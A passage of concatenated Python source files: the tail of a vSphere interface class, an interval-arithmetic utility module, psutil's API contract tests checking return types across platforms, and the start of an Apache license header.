return str(self.server) + str(self.groups) + str(self.hosts)
def __eq__(self, other):
return super(self.__class__, self).__eq__(other) and \
self.server == other.server and \
self.groups == other.groups and \
self.hosts == other.hosts
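# Example (illustrative sketch): the shape of the 'infra' dict consumed by
# VsphereInterface.__init__ above, based on the keys the class reads.  All
# values are hypothetical placeholders.
#
#     infra = {
#         "hostname": "vcenter.example.com",
#         "port": 443,
#         "login-file": "logins.json",        # optional; prompts if omitted
#         "datacenter": "Datacenter",
#         "datastore": "datastore1",
#         "hosts": ["esxi1.example.com"],     # optional; first host otherwise
#         "template-folder": "Templates",
#         "server-root": "Environments",      # optional; defaults to vmFolder
#         "vswitch": "vSwitch0",              # optional
#         "thresholds": {"folder": {"warn": 25, "error": 50},
#                        "service": {"warn": 50, "error": 70}},
#     }
#     # interface = VsphereInterface(infra=infra, spec=parsed_spec)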
|
|
'''
interval.py - Deal with intervals.
author: Xiao-Ou Zhang <[email protected]>
version: 1.0
'''
import copy
class Interval(object):
'''
Class: Interval
Maintainer: Xiao-Ou Zhang
Version: 1.0
Usage: a = Interval(list)
(nested list: [[x,x,f1...],[x,x,f2...]...] / [[x,x],[x,x]...] or
simple list: [x,x,f1...] / [x,x])
Notes: all the intervals in the list will become mutually exclusive and
be sorted after instantiation.
For example: input: [[1, 10, 'a'], [17, 22, 'b'], [7, 12, 'c'], [20, 25, 'd'], [30, 35, 'e']]
output: [[1, 12, 'a', 'c'], [17, 25, 'b', 'd'], [30, 35, 'e']]
Attributes: interval
Functions: c = a + b or a += b
c = b + a
c = a * b or a *= b
c = b * a
c = a - b or a -= b
c = b - a
a[n] or a[n:m]
[x, x] in a or [[x, x], [x, x]] not in a
a.complement(sta, end)
a.extractwith(b)
a.extractwithout(b)
mapto(interval, index) -> interval
overlapwith(index, interval) -> index
'''
def __init__(self, interval, instance_flag=0):
self.interval = [[int(i[0]), int(i[1])] + i[2:]
for i in Interval.__convert(interval)]
if not self.interval:
return
if not instance_flag:
self.interval.sort()
tmp = []
a = self.interval[0]
for b in self.interval[1:]:
if a[1] <= b[0]:
tmp.append(a)
a = b
else:
a[1] = b[1] if b[1] > a[1] else a[1]
a.extend(b[2:])
tmp.append(a)
self.interval = tmp
def __add__(self, interval):
'''
Usage: c = a + b or a += b
extract union intervals, 'a' should be instance.
'''
tmp = copy.deepcopy(self.interval)
if isinstance(interval, Interval):
tmp.extend(interval.interval)
else:
tmp.extend(Interval.__convert(interval))
return Interval(tmp)
def __radd__(self, interval):
'''
Usage: c = b + a
extract union intervals, 'a' should be instance.
'''
return self.__add__(interval)
def __mul__(self, interval, real_flag=1):
'''
Usage: c = a * b or a *= b
extract intersection intervals, 'a' should be instance.
'''
tmp = []
tmp1 = self.interval
if isinstance(interval, Interval):
tmp2 = interval.interval
else:
tmp2 = Interval(interval).interval
if not tmp1 or not tmp2:
return Interval([])
a, b = tmp1[0], tmp2[0]
i, j = 1, 1
while True:
sta = a[0] if a[0] > b[0] else b[0]
end = a[1] if a[1] < b[1] else b[1]
if sta < end:
if real_flag:
tmp.append([sta, end] + a[2:] + b[2:])
else:
tmp.append(copy.copy(a))
if a[1] == end:
if i == len(tmp1):
break
a = tmp1[i]
i += 1
if b[1] == end:
if j == len(tmp2):
break
b = tmp2[j]
j += 1
return Interval(tmp, 1)
def __rmul__(self, interval):
'''
Usage: c = b * a
extract intersection intervals, 'a' should be instance.
'''
return self.__mul__(interval)
def __sub__(self, interval, real_flag=1):
'''
Usage: c = a - b or a -= b
extract difference intervals, 'a' should be instance.
'''
if not self.interval:
return Interval([])
if isinstance(interval, Interval):
tmp = copy.deepcopy(interval)
else:
tmp = Interval(interval)
        if not tmp.interval:
return copy.deepcopy(self)
if self.interval[0][0] < tmp.interval[0][0]:
sta = self.interval[0][0]
else:
sta = tmp.interval[0][0]
if self.interval[-1][1] > tmp.interval[-1][1]:
end = self.interval[-1][1]
else:
end = tmp.interval[-1][1]
tmp.complement(sta, end)
return self.__mul__(tmp, real_flag)
def __rsub__(self, interval):
'''
Usage: c = b - a
extract difference intervals, 'a' should be instance.
'''
if isinstance(interval, Interval):
tmp = copy.deepcopy(interval)
else:
tmp = Interval(interval)
if not self.interval:
return tmp
        if not tmp.interval:
return Interval([])
if self.interval[0][0] < tmp.interval[0][0]:
sta = self.interval[0][0]
else:
sta = tmp.interval[0][0]
if self.interval[-1][1] > tmp.interval[-1][1]:
end = self.interval[-1][1]
else:
end = tmp.interval[-1][1]
tmp_a = copy.deepcopy(self)
tmp_a.complement(sta, end)
return Interval.__mul__(tmp, tmp_a)
def __getitem__(self, index):
'''
Usage: a[n] or a[n:m]
        index and slice interval objects.
'''
return self.interval[index]
def __repr__(self):
'''
print objects.
'''
return repr(self.interval)
def __contains__(self, interval):
'''
Usage: [x, x] in a or [[x, x], [x, x]] not in a
judge whether interval is in a or not, 'a' should be instance.
'''
tmp = self.__mul__(interval).interval
if tmp:
return True
else:
return False
def complement(self, sta='#', end='#'):
'''
Usage: a.complement(sta, end)
complement of 'a'.
'''
tmp = []
if sta != '#' and sta < self.interval[0][0]:
tmp.append([sta, self.interval[0][0]])
a = self.interval[0][1]
for item in self.interval[1:]:
b = item[0]
if a != b:
tmp.append([a, b])
a = item[1]
if end != '#' and end > a:
tmp.append([a, end])
self.interval = tmp
def extractwith(self, interval):
'''
Usage: a.extractwith(b)
extract intervals in 'b'.
'''
self.interval = self.__mul__(interval, 0).interval
def extractwithout(self, interval):
'''
Usage: a.extractwithout(b)
extract intervals not in 'b'.
'''
self.interval = self.__sub__(interval, 0).interval
@staticmethod
def mapto(interval, index):
'''
mapto(interval, index) -> interval
Map interval onto index.
'''
tmp1 = Interval.__init(interval)
tmp2 = Interval.__init(index)
return Interval.__map(tmp2, tmp1, flag=1)
@staticmethod
def overlapwith(index, interval):
'''
overlapwith(index, interval) -> index
Overlap index with interval.
'''
tmp1 = Interval.__init(index)
tmp2 = Interval.__init(interval)
return Interval.__map(tmp1, tmp2, flag=0)
@staticmethod
def __convert(interval):
assert type(interval) is list, 'the type you use is {}'.format(type(interval))
if not interval:
return interval
if type(interval[0]) is list:
return interval
else:
return [interval]
@staticmethod
def __init(interval):
mapping = [[int(i[0]), int(i[1])] + i[2:] for i in Interval.__convert(interval)]
mapping.sort()
return mapping
@staticmethod
def __map(index, interval, flag):
mapped_fragment = []
tmp_fragment = []
if not interval:
if flag:
return mapped_fragment
else:
return index
for dex in index:
dex_info = dex[2:]
while True:
try:
fragment = interval.pop(0)
except IndexError:
if tmp_fragment:
interval.extend(tmp_fragment)
tmp_fragment = []
continue
else:
if flag:
return mapped_fragment
else:
return index
if fragment[0] >= dex[1]:
interval.insert(0, fragment)
interval[0:0] = tmp_fragment
tmp_fragment = []
break
elif dex[0] < fragment[1] and dex[1] > fragment[0]:
dex += fragment[2:]
sta = dex[0] if dex[0] > fragment[0] else fragment[0]
end = dex[1] if dex[1] < fragment[1] else fragment[1]
new_fragment = [sta, end] + fragment[2:] + dex_info
mapped_fragment.append(new_fragment)
if fragment[1] > dex[1]:
tmp_fragment.append([dex[1],
fragment[1]] + fragment[2:])
else:
if flag:
return mapped_fragment
else:
return index
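# Example (illustrative sketch): the merging behaviour described in the class
# docstring, plus the set-style operators.
#
#     a = Interval([[1, 10, 'a'], [17, 22, 'b'], [7, 12, 'c'],
#                   [20, 25, 'd'], [30, 35, 'e']])
#     a.interval
#     # -> [[1, 12, 'a', 'c'], [17, 25, 'b', 'd'], [30, 35, 'e']]
#     b = Interval([[5, 20]])
#     (a * b).interval                # intersection
#     # -> [[5, 12, 'a', 'c'], [17, 20, 'b', 'd']]
#     [8, 9] in a                     # membership is tested via intersection
#     # -> True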
|
|
#!/usr/bin/env python3
# Copyright (c) 2009, Giampaolo Rodola'. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Contracts tests. These tests mainly check API sanity in terms of
returned types and APIs availability.
Some of these are duplicates of tests in test_system.py and test_process.py.
"""
import errno
import multiprocessing
import os
import signal
import stat
import sys
import time
import traceback
import psutil
from psutil import AIX
from psutil import BSD
from psutil import FREEBSD
from psutil import LINUX
from psutil import MACOS
from psutil import NETBSD
from psutil import OPENBSD
from psutil import OSX
from psutil import POSIX
from psutil import SUNOS
from psutil import WINDOWS
from psutil._compat import FileNotFoundError
from psutil._compat import long
from psutil._compat import range
from psutil.tests import APPVEYOR
from psutil.tests import CI_TESTING
from psutil.tests import GITHUB_ACTIONS
from psutil.tests import HAS_CPU_FREQ
from psutil.tests import HAS_NET_IO_COUNTERS
from psutil.tests import HAS_SENSORS_FANS
from psutil.tests import HAS_SENSORS_TEMPERATURES
from psutil.tests import PYPY
from psutil.tests import SKIP_SYSCONS
from psutil.tests import VALID_PROC_STATUSES
from psutil.tests import PsutilTestCase
from psutil.tests import check_connection_ntuple
from psutil.tests import create_sockets
from psutil.tests import enum
from psutil.tests import is_namedtuple
from psutil.tests import kernel_version
from psutil.tests import process_namespace
from psutil.tests import serialrun
from psutil.tests import unittest
# ===================================================================
# --- APIs availability
# ===================================================================
# Make sure code reflects what doc promises in terms of APIs
# availability.
class TestAvailConstantsAPIs(PsutilTestCase):
def test_PROCFS_PATH(self):
self.assertEqual(hasattr(psutil, "PROCFS_PATH"),
LINUX or SUNOS or AIX)
def test_win_priority(self):
ae = self.assertEqual
ae(hasattr(psutil, "ABOVE_NORMAL_PRIORITY_CLASS"), WINDOWS)
ae(hasattr(psutil, "BELOW_NORMAL_PRIORITY_CLASS"), WINDOWS)
ae(hasattr(psutil, "HIGH_PRIORITY_CLASS"), WINDOWS)
ae(hasattr(psutil, "IDLE_PRIORITY_CLASS"), WINDOWS)
ae(hasattr(psutil, "NORMAL_PRIORITY_CLASS"), WINDOWS)
ae(hasattr(psutil, "REALTIME_PRIORITY_CLASS"), WINDOWS)
def test_linux_ioprio_linux(self):
ae = self.assertEqual
ae(hasattr(psutil, "IOPRIO_CLASS_NONE"), LINUX)
ae(hasattr(psutil, "IOPRIO_CLASS_RT"), LINUX)
ae(hasattr(psutil, "IOPRIO_CLASS_BE"), LINUX)
ae(hasattr(psutil, "IOPRIO_CLASS_IDLE"), LINUX)
def test_linux_ioprio_windows(self):
ae = self.assertEqual
ae(hasattr(psutil, "IOPRIO_HIGH"), WINDOWS)
ae(hasattr(psutil, "IOPRIO_NORMAL"), WINDOWS)
ae(hasattr(psutil, "IOPRIO_LOW"), WINDOWS)
ae(hasattr(psutil, "IOPRIO_VERYLOW"), WINDOWS)
@unittest.skipIf(GITHUB_ACTIONS and LINUX,
"unsupported on GITHUB_ACTIONS + LINUX")
def test_rlimit(self):
ae = self.assertEqual
ae(hasattr(psutil, "RLIM_INFINITY"), LINUX or FREEBSD)
ae(hasattr(psutil, "RLIMIT_AS"), LINUX or FREEBSD)
ae(hasattr(psutil, "RLIMIT_CORE"), LINUX or FREEBSD)
ae(hasattr(psutil, "RLIMIT_CPU"), LINUX or FREEBSD)
ae(hasattr(psutil, "RLIMIT_DATA"), LINUX or FREEBSD)
ae(hasattr(psutil, "RLIMIT_FSIZE"), LINUX or FREEBSD)
ae(hasattr(psutil, "RLIMIT_MEMLOCK"), LINUX or FREEBSD)
ae(hasattr(psutil, "RLIMIT_NOFILE"), LINUX or FREEBSD)
ae(hasattr(psutil, "RLIMIT_NPROC"), LINUX or FREEBSD)
ae(hasattr(psutil, "RLIMIT_RSS"), LINUX or FREEBSD)
ae(hasattr(psutil, "RLIMIT_STACK"), LINUX or FREEBSD)
ae(hasattr(psutil, "RLIMIT_LOCKS"), LINUX)
if POSIX:
if kernel_version() >= (2, 6, 8):
ae(hasattr(psutil, "RLIMIT_MSGQUEUE"), LINUX)
if kernel_version() >= (2, 6, 12):
ae(hasattr(psutil, "RLIMIT_NICE"), LINUX)
if kernel_version() >= (2, 6, 12):
ae(hasattr(psutil, "RLIMIT_RTPRIO"), LINUX)
if kernel_version() >= (2, 6, 25):
ae(hasattr(psutil, "RLIMIT_RTTIME"), LINUX)
if kernel_version() >= (2, 6, 8):
ae(hasattr(psutil, "RLIMIT_SIGPENDING"), LINUX)
ae(hasattr(psutil, "RLIMIT_SWAP"), FREEBSD)
ae(hasattr(psutil, "RLIMIT_SBSIZE"), FREEBSD)
ae(hasattr(psutil, "RLIMIT_NPTS"), FREEBSD)
class TestAvailSystemAPIs(PsutilTestCase):
def test_win_service_iter(self):
self.assertEqual(hasattr(psutil, "win_service_iter"), WINDOWS)
def test_win_service_get(self):
self.assertEqual(hasattr(psutil, "win_service_get"), WINDOWS)
def test_cpu_freq(self):
self.assertEqual(hasattr(psutil, "cpu_freq"),
LINUX or MACOS or WINDOWS or FREEBSD or OPENBSD)
def test_sensors_temperatures(self):
self.assertEqual(
hasattr(psutil, "sensors_temperatures"), LINUX or FREEBSD)
def test_sensors_fans(self):
self.assertEqual(hasattr(psutil, "sensors_fans"), LINUX)
def test_battery(self):
self.assertEqual(hasattr(psutil, "sensors_battery"),
LINUX or WINDOWS or FREEBSD or MACOS)
class TestAvailProcessAPIs(PsutilTestCase):
def test_environ(self):
self.assertEqual(hasattr(psutil.Process, "environ"),
LINUX or MACOS or WINDOWS or AIX or SUNOS or
FREEBSD or OPENBSD or NETBSD)
def test_uids(self):
self.assertEqual(hasattr(psutil.Process, "uids"), POSIX)
def test_gids(self):
self.assertEqual(hasattr(psutil.Process, "uids"), POSIX)
def test_terminal(self):
self.assertEqual(hasattr(psutil.Process, "terminal"), POSIX)
def test_ionice(self):
self.assertEqual(hasattr(psutil.Process, "ionice"), LINUX or WINDOWS)
@unittest.skipIf(GITHUB_ACTIONS and LINUX,
"unsupported on GITHUB_ACTIONS + LINUX")
def test_rlimit(self):
self.assertEqual(hasattr(psutil.Process, "rlimit"), LINUX or FREEBSD)
def test_io_counters(self):
hasit = hasattr(psutil.Process, "io_counters")
self.assertEqual(hasit, False if MACOS or SUNOS else True)
def test_num_fds(self):
self.assertEqual(hasattr(psutil.Process, "num_fds"), POSIX)
def test_num_handles(self):
self.assertEqual(hasattr(psutil.Process, "num_handles"), WINDOWS)
def test_cpu_affinity(self):
self.assertEqual(hasattr(psutil.Process, "cpu_affinity"),
LINUX or WINDOWS or FREEBSD)
def test_cpu_num(self):
self.assertEqual(hasattr(psutil.Process, "cpu_num"),
LINUX or FREEBSD or SUNOS)
def test_memory_maps(self):
hasit = hasattr(psutil.Process, "memory_maps")
self.assertEqual(
hasit, False if OPENBSD or NETBSD or AIX or MACOS else True)
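# Example (illustrative sketch): the availability pattern the tests above
# assert, checked interactively.  The expected booleans depend on the
# platform, exactly as encoded in the assertions.
#
#     >>> import psutil
#     >>> hasattr(psutil.Process, "rlimit")    # True only on Linux / FreeBSD
#     >>> hasattr(psutil, "win_service_iter")  # True only on Windows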
# ===================================================================
# --- API types
# ===================================================================
class TestSystemAPITypes(PsutilTestCase):
"""Check the return types of system related APIs.
Mainly we want to test we never return unicode on Python 2, see:
https://github.com/giampaolo/psutil/issues/1039
"""
@classmethod
def setUpClass(cls):
cls.proc = psutil.Process()
def assert_ntuple_of_nums(self, nt, type_=float, gezero=True):
assert is_namedtuple(nt)
for n in nt:
self.assertIsInstance(n, type_)
if gezero:
self.assertGreaterEqual(n, 0)
def test_cpu_times(self):
self.assert_ntuple_of_nums(psutil.cpu_times())
for nt in psutil.cpu_times(percpu=True):
self.assert_ntuple_of_nums(nt)
def test_cpu_percent(self):
self.assertIsInstance(psutil.cpu_percent(interval=None), float)
self.assertIsInstance(psutil.cpu_percent(interval=0.00001), float)
def test_cpu_times_percent(self):
self.assert_ntuple_of_nums(psutil.cpu_times_percent(interval=None))
self.assert_ntuple_of_nums(psutil.cpu_times_percent(interval=0.0001))
def test_cpu_count(self):
self.assertIsInstance(psutil.cpu_count(), int)
@unittest.skipIf(not HAS_CPU_FREQ, "not supported")
def test_cpu_freq(self):
if psutil.cpu_freq() is None:
raise self.skipTest("cpu_freq() returns None")
self.assert_ntuple_of_nums(psutil.cpu_freq(), type_=(float, int, long))
def test_disk_io_counters(self):
# Duplicate of test_system.py. Keep it anyway.
for k, v in psutil.disk_io_counters(perdisk=True).items():
self.assertIsInstance(k, str)
self.assert_ntuple_of_nums(v, type_=(int, long))
def test_disk_partitions(self):
# Duplicate of test_system.py. Keep it anyway.
for disk in psutil.disk_partitions():
self.assertIsInstance(disk.device, str)
self.assertIsInstance(disk.mountpoint, str)
self.assertIsInstance(disk.fstype, str)
self.assertIsInstance(disk.opts, str)
self.assertIsInstance(disk.maxfile, int)
self.assertIsInstance(disk.maxpath, int)
@unittest.skipIf(SKIP_SYSCONS, "requires root")
def test_net_connections(self):
with create_sockets():
ret = psutil.net_connections('all')
self.assertEqual(len(ret), len(set(ret)))
for conn in ret:
assert is_namedtuple(conn)
def test_net_if_addrs(self):
# Duplicate of test_system.py. Keep it anyway.
for ifname, addrs in psutil.net_if_addrs().items():
self.assertIsInstance(ifname, str)
for addr in addrs:
if enum is not None and not PYPY:
self.assertIsInstance(addr.family, enum.IntEnum)
else:
self.assertIsInstance(addr.family, int)
self.assertIsInstance(addr.address, str)
self.assertIsInstance(addr.netmask, (str, type(None)))
self.assertIsInstance(addr.broadcast, (str, type(None)))
def test_net_if_stats(self):
# Duplicate of test_system.py. Keep it anyway.
for ifname, info in psutil.net_if_stats().items():
self.assertIsInstance(ifname, str)
self.assertIsInstance(info.isup, bool)
if enum is not None:
self.assertIsInstance(info.duplex, enum.IntEnum)
else:
self.assertIsInstance(info.duplex, int)
self.assertIsInstance(info.speed, int)
self.assertIsInstance(info.mtu, int)
@unittest.skipIf(not HAS_NET_IO_COUNTERS, 'not supported')
def test_net_io_counters(self):
# Duplicate of test_system.py. Keep it anyway.
for ifname, _ in psutil.net_io_counters(pernic=True).items():
self.assertIsInstance(ifname, str)
@unittest.skipIf(not HAS_SENSORS_FANS, "not supported")
def test_sensors_fans(self):
# Duplicate of test_system.py. Keep it anyway.
for name, units in psutil.sensors_fans().items():
self.assertIsInstance(name, str)
for unit in units:
self.assertIsInstance(unit.label, str)
self.assertIsInstance(unit.current, (float, int, type(None)))
@unittest.skipIf(not HAS_SENSORS_TEMPERATURES, "not supported")
def test_sensors_temperatures(self):
# Duplicate of test_system.py. Keep it anyway.
for name, units in psutil.sensors_temperatures().items():
self.assertIsInstance(name, str)
for unit in units:
self.assertIsInstance(unit.label, str)
self.assertIsInstance(unit.current, (float, int, type(None)))
self.assertIsInstance(unit.high, (float, int, type(None)))
self.assertIsInstance(unit.critical, (float, int, type(None)))
def test_boot_time(self):
# Duplicate of test_system.py. Keep it anyway.
self.assertIsInstance(psutil.boot_time(), float)
def test_users(self):
# Duplicate of test_system.py. Keep it anyway.
for user in psutil.users():
self.assertIsInstance(user.name, str)
self.assertIsInstance(user.terminal, (str, type(None)))
self.assertIsInstance(user.host, (str, type(None)))
self.assertIsInstance(user.pid, (int, type(None)))
class TestProcessWaitType(PsutilTestCase):
@unittest.skipIf(not POSIX, "not POSIX")
def test_negative_signal(self):
p = psutil.Process(self.spawn_testproc().pid)
p.terminate()
code = p.wait()
self.assertEqual(code, -signal.SIGTERM)
if enum is not None:
self.assertIsInstance(code, enum.IntEnum)
else:
self.assertIsInstance(code, int)
# ===================================================================
# --- Fetch all processes test
# ===================================================================
def proc_info(pid):
tcase = PsutilTestCase()
def check_exception(exc, proc, name, ppid):
tcase.assertEqual(exc.pid, pid)
tcase.assertEqual(exc.name, name)
if isinstance(exc, psutil.ZombieProcess):
if exc.ppid is not None:
tcase.assertGreaterEqual(exc.ppid, 0)
tcase.assertEqual(exc.ppid, ppid)
elif isinstance(exc, psutil.NoSuchProcess):
tcase.assertProcessGone(proc)
str(exc)
def do_wait():
if pid != 0:
try:
proc.wait(0)
except psutil.Error as exc:
check_exception(exc, proc, name, ppid)
try:
proc = psutil.Process(pid)
d = proc.as_dict(['ppid', 'name'])
except psutil.NoSuchProcess:
return {}
name, ppid = d['name'], d['ppid']
info = {'pid': proc.pid}
ns = process_namespace(proc)
    # We don't use oneshot() in order not to fool
    # check_exception() in case of NSP.
for fun, fun_name in ns.iter(ns.getters, clear_cache=False):
try:
info[fun_name] = fun()
except psutil.Error as exc:
check_exception(exc, proc, name, ppid)
continue
do_wait()
return info
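# Illustrative note (added for clarity; not part of the original logic):
# proc_info() returns a plain dict keyed by the Process getter names that
# process_namespace() exposes on this platform, e.g. roughly
# {'pid': 1234, 'name': ..., 'cpu_times': ..., ...}; a PID that disappears
# while being inspected simply yields {}.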
@serialrun
class TestFetchAllProcesses(PsutilTestCase):
"""Test which iterates over all running processes and performs
some sanity checks against Process API's returned values.
Uses a process pool to get info about all processes.
"""
def setUp(self):
self.pool = multiprocessing.Pool()
def tearDown(self):
self.pool.terminate()
self.pool.join()
def iter_proc_info(self):
# Fixes "can't pickle <function proc_info>: it's not the
# same object as test_contracts.proc_info".
from psutil.tests.test_contracts import proc_info
return self.pool.imap_unordered(proc_info, psutil.pids())
def test_all(self):
failures = []
for info in self.iter_proc_info():
for name, value in info.items():
meth = getattr(self, name)
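                # (each key returned by proc_info() maps onto a checker
                # method defined below, e.g. 'cpu_times' -> self.cpu_times)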
try:
meth(value, info)
except AssertionError:
s = '\n' + '=' * 70 + '\n'
s += "FAIL: test_%s pid=%s, ret=%s\n" % (
name, info['pid'], repr(value))
s += '-' * 70
s += "\n%s" % traceback.format_exc()
s = "\n".join((" " * 4) + i for i in s.splitlines())
s += '\n'
failures.append(s)
else:
if value not in (0, 0.0, [], None, '', {}):
assert value, value
if failures:
raise self.fail(''.join(failures))
def cmdline(self, ret, info):
self.assertIsInstance(ret, list)
for part in ret:
self.assertIsInstance(part, str)
def exe(self, ret, info):
self.assertIsInstance(ret, (str, type(None)))
if not ret:
self.assertEqual(ret, '')
else:
if WINDOWS and not ret.endswith('.exe'):
return # May be "Registry", "MemCompression", ...
assert os.path.isabs(ret), ret
            # Note: os.path.isfile() may return False even if the file is
            # there, hence we skip the executable check in that case, see:
# http://stackoverflow.com/questions/3112546/os-path-exists-lies
if POSIX and os.path.isfile(ret):
if hasattr(os, 'access') and hasattr(os, "X_OK"):
# XXX: may fail on MACOS
try:
assert os.access(ret, os.X_OK)
except AssertionError:
if os.path.exists(ret) and not CI_TESTING:
raise
def pid(self, ret, info):
self.assertIsInstance(ret, int)
self.assertGreaterEqual(ret, 0)
def ppid(self, ret, info):
self.assertIsInstance(ret, (int, long))
self.assertGreaterEqual(ret, 0)
def name(self, ret, info):
self.assertIsInstance(ret, str)
if APPVEYOR and not ret and info['status'] == 'stopped':
return
# on AIX, "<exiting>" processes don't have names
if not AIX:
assert ret
def create_time(self, ret, info):
self.assertIsInstance(ret, float)
try:
self.assertGreaterEqual(ret, 0)
except AssertionError:
# XXX
if OPENBSD and info['status'] == psutil.STATUS_ZOMBIE:
pass
else:
raise
# this can't be taken for granted on all platforms
# self.assertGreaterEqual(ret, psutil.boot_time())
# make sure returned value can be pretty printed
# with strftime
time.strftime("%Y %m %d %H:%M:%S", time.localtime(ret))
def uids(self, ret, info):
assert is_namedtuple(ret)
for uid in ret:
self.assertIsInstance(uid, int)
self.assertGreaterEqual(uid, 0)
def gids(self, ret, info):
assert is_namedtuple(ret)
# note: testing all gids as above seems not to be reliable for
        # gid == 30 (nobody); not sure why.
for gid in ret:
self.assertIsInstance(gid, int)
if not MACOS and not NETBSD:
self.assertGreaterEqual(gid, 0)
def username(self, ret, info):
self.assertIsInstance(ret, str)
assert ret
def status(self, ret, info):
self.assertIsInstance(ret, str)
assert ret
self.assertNotEqual(ret, '?') # XXX
self.assertIn(ret, VALID_PROC_STATUSES)
def io_counters(self, ret, info):
assert is_namedtuple(ret)
for field in ret:
self.assertIsInstance(field, (int, long))
if field != -1:
self.assertGreaterEqual(field, 0)
def ionice(self, ret, info):
if LINUX:
self.assertIsInstance(ret.ioclass, int)
self.assertIsInstance(ret.value, int)
self.assertGreaterEqual(ret.ioclass, 0)
self.assertGreaterEqual(ret.value, 0)
else: # Windows, Cygwin
choices = [
psutil.IOPRIO_VERYLOW,
psutil.IOPRIO_LOW,
psutil.IOPRIO_NORMAL,
psutil.IOPRIO_HIGH]
self.assertIsInstance(ret, int)
self.assertGreaterEqual(ret, 0)
self.assertIn(ret, choices)
def num_threads(self, ret, info):
self.assertIsInstance(ret, int)
if APPVEYOR and not ret and info['status'] == 'stopped':
return
self.assertGreaterEqual(ret, 1)
def threads(self, ret, info):
self.assertIsInstance(ret, list)
for t in ret:
assert is_namedtuple(t)
self.assertGreaterEqual(t.id, 0)
self.assertGreaterEqual(t.user_time, 0)
self.assertGreaterEqual(t.system_time, 0)
for field in t:
self.assertIsInstance(field, (int, float))
def cpu_times(self, ret, info):
assert is_namedtuple(ret)
for n in ret:
self.assertIsInstance(n, float)
self.assertGreaterEqual(n, 0)
# TODO: check ntuple fields
def cpu_percent(self, ret, info):
self.assertIsInstance(ret, float)
assert 0.0 <= ret <= 100.0, ret
def cpu_num(self, ret, info):
self.assertIsInstance(ret, int)
if FREEBSD and ret == -1:
return
self.assertGreaterEqual(ret, 0)
if psutil.cpu_count() == 1:
self.assertEqual(ret, 0)
self.assertIn(ret, list(range(psutil.cpu_count())))
def memory_info(self, ret, info):
assert is_namedtuple(ret)
for value in ret:
self.assertIsInstance(value, (int, long))
self.assertGreaterEqual(value, 0)
if WINDOWS:
self.assertGreaterEqual(ret.peak_wset, ret.wset)
self.assertGreaterEqual(ret.peak_paged_pool, ret.paged_pool)
self.assertGreaterEqual(ret.peak_nonpaged_pool, ret.nonpaged_pool)
self.assertGreaterEqual(ret.peak_pagefile, ret.pagefile)
def memory_full_info(self, ret, info):
assert is_namedtuple(ret)
total = psutil.virtual_memory().total
for name in ret._fields:
value = getattr(ret, name)
self.assertIsInstance(value, (int, long))
self.assertGreaterEqual(value, 0, msg=(name, value))
if LINUX or OSX and name in ('vms', 'data'):
# On Linux there are processes (e.g. 'goa-daemon') whose
# VMS is incredibly high for some reason.
continue
self.assertLessEqual(value, total, msg=(name, value, total))
if LINUX:
self.assertGreaterEqual(ret.pss, ret.uss)
def open_files(self, ret, info):
self.assertIsInstance(ret, list)
for f in ret:
self.assertIsInstance(f.fd, int)
self.assertIsInstance(f.path, str)
if WINDOWS:
self.assertEqual(f.fd, -1)
elif LINUX:
self.assertIsInstance(f.position, int)
self.assertIsInstance(f.mode, str)
self.assertIsInstance(f.flags, int)
self.assertGreaterEqual(f.position, 0)
self.assertIn(f.mode, ('r', 'w', 'a', 'r+', 'a+'))
self.assertGreater(f.flags, 0)
elif BSD and not f.path:
# XXX see: https://github.com/giampaolo/psutil/issues/595
continue
assert os.path.isabs(f.path), f
try:
st = os.stat(f.path)
except FileNotFoundError:
pass
else:
assert stat.S_ISREG(st.st_mode), f
def num_fds(self, ret, info):
self.assertIsInstance(ret, int)
self.assertGreaterEqual(ret, 0)
def connections(self, ret, info):
with create_sockets():
self.assertEqual(len(ret), len(set(ret)))
for conn in ret:
assert is_namedtuple(conn)
check_connection_ntuple(conn)
def cwd(self, ret, info):
if ret: # 'ret' can be None or empty
self.assertIsInstance(ret, str)
assert os.path.isabs(ret), ret
try:
st = os.stat(ret)
except OSError as err:
if WINDOWS and err.errno in \
psutil._psplatform.ACCESS_DENIED_SET:
pass
                # directory has been removed in the meantime
elif err.errno != errno.ENOENT:
raise
else:
assert stat.S_ISDIR(st.st_mode)
def memory_percent(self, ret, info):
self.assertIsInstance(ret, float)
assert 0 <= ret <= 100, ret
def is_running(self, ret, info):
self.assertIsInstance(ret, bool)
def cpu_affinity(self, ret, info):
self.assertIsInstance(ret, list)
assert ret != [], ret
cpus = list(range(psutil.cpu_count()))
for n in ret:
self.assertIsInstance(n, int)
self.assertIn(n, cpus)
def terminal(self, ret, info):
self.assertIsInstance(ret, (str, type(None)))
if ret is not None:
assert os.path.isabs(ret), ret
assert os.path.exists(ret), ret
def memory_maps(self, ret, info):
for nt in ret:
self.assertIsInstance(nt.addr, str)
self.assertIsInstance(nt.perms, str)
self.assertIsInstance(nt.path, str)
for fname in nt._fields:
value = getattr(nt, fname)
if fname == 'path':
if not value.startswith('['):
assert os.path.isabs(nt.path), nt.path
# commented as on Linux we might get
# '/foo/bar (deleted)'
# assert os.path.exists(nt.path), nt.path
elif fname == 'addr':
assert value, repr(value)
elif fname == 'perms':
if not WINDOWS:
assert value, repr(value)
else:
self.assertIsInstance(value, (int, long))
self.assertGreaterEqual(value, 0)
def num_handles(self, ret, info):
self.assertIsInstance(ret, int)
self.assertGreaterEqual(ret, 0)
def nice(self, ret, info):
self.assertIsInstance(ret, int)
if POSIX:
assert -20 <= ret <= 20, ret
else:
priorities = [getattr(psutil, x) for x in dir(psutil)
if x.endswith('_PRIORITY_CLASS')]
self.assertIn(ret, priorities)
if sys.version_info > (3, 4):
self.assertIsInstance(ret, enum.IntEnum)
else:
self.assertIsInstance(ret, int)
def num_ctx_switches(self, ret, info):
assert is_namedtuple(ret)
for value in ret:
self.assertIsInstance(value, (int, long))
self.assertGreaterEqual(value, 0)
def rlimit(self, ret, info):
self.assertIsInstance(ret, tuple)
self.assertEqual(len(ret), 2)
self.assertGreaterEqual(ret[0], -1)
self.assertGreaterEqual(ret[1], -1)
def environ(self, ret, info):
self.assertIsInstance(ret, dict)
for k, v in ret.items():
self.assertIsInstance(k, str)
self.assertIsInstance(v, str)
if __name__ == '__main__':
from psutil.tests.runner import run_from_name
run_from_name(__file__)
|
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
